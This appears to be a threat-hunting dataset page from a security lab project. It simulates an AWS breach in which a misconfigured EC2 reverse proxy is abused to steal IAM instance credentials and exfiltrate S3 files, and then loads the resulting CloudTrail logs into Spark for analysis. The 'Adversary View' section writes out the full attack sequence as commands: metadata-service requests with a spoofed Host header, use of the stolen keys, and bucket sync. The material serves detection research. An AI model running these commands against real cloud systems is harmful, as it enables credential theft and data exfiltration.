AWS Cloud Bank Breach S3

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/13

Modification Date

2020/09/13

Tactics

[‘TA0001’, ‘TA0003’, ‘TA0004’, ‘TA0005’, ‘TA0009’]

Techniques

[‘T1078.004’, ‘T1530’]

Tags

[‘EC2 Proxy Abuse’, ‘S3 Data Exfiltration’]

Dataset Description

This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3

Cloud Formation Templates

Exfiltration

Adversary View

> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"                                            
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0                                                                                                                                                              >

> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
{
"Code" : "Success",
"LastUpdated" : "2020-09-14T00:49:26Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
"SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
"Token" : "TOKEN",
"Expiration" : "2020-09-14T07:10:27Z"
}

> aws configure --profile erratic
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
Default region name [None]: us-east-1
Default output format [None]: json

> echo aws_session_token = "TOKEN" >> ~/.aws/credentials 

> aws s3 ls --profile erratic
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a

> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt

> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt

> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic                                   
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/aws/collection/ec2_proxy_s3_exfiltration.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT *
FROM mordorTable
'''
)
df.show(1, vertical=True)
-RECORD 0-----------------------------------
 @timestamp          | 2020-09-13 20:44:23  
 @version            | 1                    
 additionalEventData | null                 
 apiVersion          | null                 
 awsRegion           | us-east-1            
 eventCategory       | null                 
 eventID             | fd4f1042-c7f6-410... 
 eventName           | DescribeInstanceT... 
 eventSource         | ec2.amazonaws.com    
 eventType           | AwsApiCall           
 eventVersion        | 1.05                 
 managementEvent     | null                 
 readOnly            | null                 
 recipientAccountId  | 123456789123         
 requestID           | 2db6a7b5-876c-499... 
 requestParameters   | [,, [100, AAIAAUC... 
 resources           | null                 
 responseElements    | null                 
 sharedEventID       | null                 
 sourceIPAddress     | 1.2.3.4              
 userAgent           | console.ec2.amazo... 
 userIdentity        | [ASIA5FLZVX4OI4ZD... 
only showing top 1 row